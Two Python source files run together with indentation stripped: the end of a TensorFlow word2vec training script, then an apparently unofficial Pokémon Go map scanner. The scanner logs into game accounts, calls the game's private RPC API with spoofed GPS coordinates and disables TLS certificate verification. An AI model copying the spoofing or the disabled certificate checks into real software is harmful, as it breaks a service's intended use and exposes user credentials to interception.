ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Output words embedding: [vocab_size, emb_dim]
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vector on the unit hyper-sphere is
# near c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5)  # Report our progress once in a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy('france', 'paris', 'russia')
# [1]: model.nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
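# --- Hedged usage note (editor's addition, not part of the original script) ---
# Typical invocation, using the flag names referenced in main(); the corpus and
# analogy file names below are assumptions (the usual text8 / questions-words
# setup), not something this listing specifies:
#
#   python <this_script>.py --train_data=text8 \
#       --eval_data=questions-words.txt --save_path=/tmp/w2v
#
# After training, the --interactive flag drops into an IPython shell where
# model.analogy() and model.nearby() can be called directly.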
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import functools
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
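# --- Hedged illustration (editor's addition, not part of the original script) ---
# memoize() caches results keyed on the stringified (args, kwargs), so repeated
# calls with the same arguments return the cached value instead of re-running
# the wrapped function. A minimal sketch with a hypothetical helper:
@memoize
def _example_cached_square(n):
    return n * n
# _example_cached_square(4) computes 16 once; calling it again with 4 returns the cached result.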
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
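# --- Hedged note (editor's addition) ---
# getNeighbors() returns 21 level-15 S2 cell ids: the cell covering the current
# position plus the 10 cells before and the 10 after it along the S2 curve.
# These ids are packed into the MessageQuad request in get_heartbeat() below.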
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
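# --- Hedged illustration (editor's addition, not part of the original script) ---
# f2i/f2h reinterpret the 64-bit IEEE-754 pattern of a double as an unsigned
# integer (or its hex string), which is the form the RPC payload expects; h2f
# reverses the hex form. A minimal round-trip sketch:
def _example_float_bits_roundtrip(value=37.7749):
    bits = f2i(value)  # float -> 64-bit pattern as an unsigned integer
    back = struct.unpack('<d', struct.pack('<Q', bits))[0]  # pattern -> float again
    assert back == value
    return bits, back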
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Return the cached login token, performing a PTC or Google login on first use.
:return: the access token
:rtype: str
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
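# --- Hedged illustration (editor's addition, not part of the original script) ---
# The scan loop in main() is based on the canonical square-spiral walk: (x, y)
# start at (0, 0) and the direction (dx, dy) rotates 90 degrees whenever the
# walk reaches a corner of the current ring. The index math, isolated as a
# sketch (main() additionally interleaves the scan and location calls):
def _example_spiral_offsets(steplimit):
    x = y = 0
    dx, dy = 0, -1
    half = steplimit ** 2 / 2
    offsets = []
    for _ in range(steplimit ** 2):
        if -half < x <= half and -half < y <= half:
            offsets.append((x, y))
        if x == y or (x < 0 and x == -y) or (x > 0 and x == 1 - y):
            dx, dy = -dy, dx
        x, y = x + dx, y + dy
    return offsets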
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pok'+u'\xe9'+'mon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = set([])
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId + ':' \
+ str(wild.pokemon.PokemonId)
if hash not in seen:
visible.append(wild)
seen.add(hash)
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokename = pokemonsJSON[str(poke.pokemon.PokemonId)]
if args.ignore:
if pokename.lower() in ignore:
continue
elif args.only:
if pokename.lower() not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
